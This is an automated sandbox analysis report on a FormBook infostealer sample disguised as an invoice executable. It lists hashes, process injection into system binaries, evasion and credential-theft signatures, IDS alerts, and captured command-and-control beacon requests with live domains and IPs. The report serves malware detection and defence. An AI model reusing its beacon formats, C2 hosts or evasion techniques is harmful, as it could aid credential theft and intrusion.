Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORIGINAL INVOICE COAU7230734290.exe

Overview

General Information

Sample name:ORIGINAL INVOICE COAU7230734290.exe
Analysis ID:1562307
MD5:faf30d977546a3527433829420a666c5
SHA1:5258f4d7a4422007f249a28b67320d6b9e3d978d
SHA256:2d9b62300c1248c233aa02fa4daa6d77efed6b8c617a8b33f4e9b71590941cda
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ORIGINAL INVOICE COAU7230734290.exe (PID: 2732 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe" MD5: FAF30D977546A3527433829420A666C5)
    • svchost.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • tOxaspWNamv.exe (PID: 4608 cmdline: "C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • srdelayed.exe (PID: 4032 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)
        • ktmutil.exe (PID: 2884 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • tOxaspWNamv.exe (PID: 3196 cmdline: "C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4048 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", CommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", ParentImage: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, ParentProcessId: 2732, ParentProcessName: ORIGINAL INVOICE COAU7230734290.exe, ProcessCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", ProcessId: 6480, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", CommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", ParentImage: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, ParentProcessId: 2732, ParentProcessName: ORIGINAL INVOICE COAU7230734290.exe, ProcessCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", ProcessId: 6480, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-25T13:45:03.450115+010020507451Malware Command and Control Activity Detected192.168.2.649827154.216.76.8080TCP
                2024-11-25T13:45:28.719654+010020507451Malware Command and Control Activity Detected192.168.2.6498903.33.130.19080TCP
                2024-11-25T13:45:43.659303+010020507451Malware Command and Control Activity Detected192.168.2.649928203.161.49.19380TCP
                2024-11-25T13:45:58.579118+010020507451Malware Command and Control Activity Detected192.168.2.6499643.33.130.19080TCP
                2024-11-25T13:46:13.971819+010020507451Malware Command and Control Activity Detected192.168.2.6500043.33.130.19080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-25T13:45:03.450115+010028554651A Network Trojan was detected192.168.2.649827154.216.76.8080TCP
                2024-11-25T13:45:28.719654+010028554651A Network Trojan was detected192.168.2.6498903.33.130.19080TCP
                2024-11-25T13:45:43.659303+010028554651A Network Trojan was detected192.168.2.649928203.161.49.19380TCP
                2024-11-25T13:45:58.579118+010028554651A Network Trojan was detected192.168.2.6499643.33.130.19080TCP
                2024-11-25T13:46:13.971819+010028554651A Network Trojan was detected192.168.2.6500043.33.130.19080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-25T13:45:20.641849+010028554641A Network Trojan was detected192.168.2.6498663.33.130.19080TCP
                2024-11-25T13:45:23.406485+010028554641A Network Trojan was detected192.168.2.6498743.33.130.19080TCP
                2024-11-25T13:45:26.016198+010028554641A Network Trojan was detected192.168.2.6498833.33.130.19080TCP
                2024-11-25T13:45:35.709825+010028554641A Network Trojan was detected192.168.2.649906203.161.49.19380TCP
                2024-11-25T13:45:38.417505+010028554641A Network Trojan was detected192.168.2.649913203.161.49.19380TCP
                2024-11-25T13:45:41.101249+010028554641A Network Trojan was detected192.168.2.649919203.161.49.19380TCP
                2024-11-25T13:45:50.648849+010028554641A Network Trojan was detected192.168.2.6499453.33.130.19080TCP
                2024-11-25T13:45:53.210916+010028554641A Network Trojan was detected192.168.2.6499523.33.130.19080TCP
                2024-11-25T13:45:55.867569+010028554641A Network Trojan was detected192.168.2.6499583.33.130.19080TCP
                2024-11-25T13:46:05.569306+010028554641A Network Trojan was detected192.168.2.6499803.33.130.19080TCP
                2024-11-25T13:46:08.305397+010028554641A Network Trojan was detected192.168.2.6499863.33.130.19080TCP
                2024-11-25T13:46:11.040675+010028554641A Network Trojan was detected192.168.2.6499943.33.130.19080TCP
                2024-11-25T13:46:22.569295+010028554641A Network Trojan was detected192.168.2.650022198.252.98.5480TCP
                2024-11-25T13:46:25.223693+010028554641A Network Trojan was detected192.168.2.650028198.252.98.5480TCP
                2024-11-25T13:46:27.927685+010028554641A Network Trojan was detected192.168.2.650029198.252.98.5480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: ORIGINAL INVOICE COAU7230734290.exeReversingLabs: Detection: 68%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3409182554.0000000004790000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3409416368.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3409702511.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: ORIGINAL INVOICE COAU7230734290.exeJoe Sandbox ML: detected
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tOxaspWNamv.exe, 00000008.00000002.3405222238.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409614358.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2165458850.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2163294510.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2391635779.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2389578275.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2502109866.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2504208467.0000000003028000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdbGCTL source: tOxaspWNamv.exe, 00000008.00000003.2433589740.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2165458850.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2163294510.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.2493451391.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2391635779.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2389578275.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 0000000B.00000003.2502109866.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2504208467.0000000003028000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000004.00000002.2493286869.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493265316.0000000003400000.00000004.00000020.00020000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000003.2434247222.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000004.00000002.2493286869.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493265316.0000000003400000.00000004.00000020.00020000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000003.2434247222.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdb source: tOxaspWNamv.exe, 00000008.00000003.2433589740.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412669118.00000000037FC000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000000.2571842961.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.000000001763C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412669118.00000000037FC000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000000.2571842961.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.000000001763C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00236CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00236CA9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_002360DD
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_002363F9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0023EB60
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023F56F FindFirstFileW,FindClose,2_2_0023F56F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0023F5FA
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00241B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00241B2F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00241C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00241C8A
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00241F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00241F94
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_0279C810 FindFirstFileW,FindNextFileW,FindClose,11_2_0279C810
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then xor eax, eax11_2_02789F20
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then pop edi11_2_0278E50B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then mov ebx, 00000004h11_2_02FC04DF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49827 -> 154.216.76.80:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49827 -> 154.216.76.80:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49890 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49890 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49874 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49866 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49919 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49913 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49928 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49928 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49883 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49945 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49952 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49958 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49964 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49964 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49980 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49906 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 198.252.98.54:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.huiguang.xyz
                Source: DNS query: www.schedulemassage.xyz
                Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
                Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00244EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_00244EB5
                Source: global trafficHTTP traffic detected: GET /hv6g/?Hx=ot9h&yX7=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.huiguang.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /79tr/?yX7=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&Hx=ot9h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hxmz/?Hx=ot9h&yX7=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.futurevision.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /slxp/?yX7=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&Hx=ot9h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.schedulemassage.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0598/?yX7=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=&Hx=ot9h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mcfunding.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.huiguang.xyz
                Source: global trafficDNS traffic detected: DNS query: www.beingandbecoming.ltd
                Source: global trafficDNS traffic detected: DNS query: www.futurevision.life
                Source: global trafficDNS traffic detected: DNS query: www.schedulemassage.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mcfunding.org
                Source: global trafficDNS traffic detected: DNS query: www.migorengya8.click
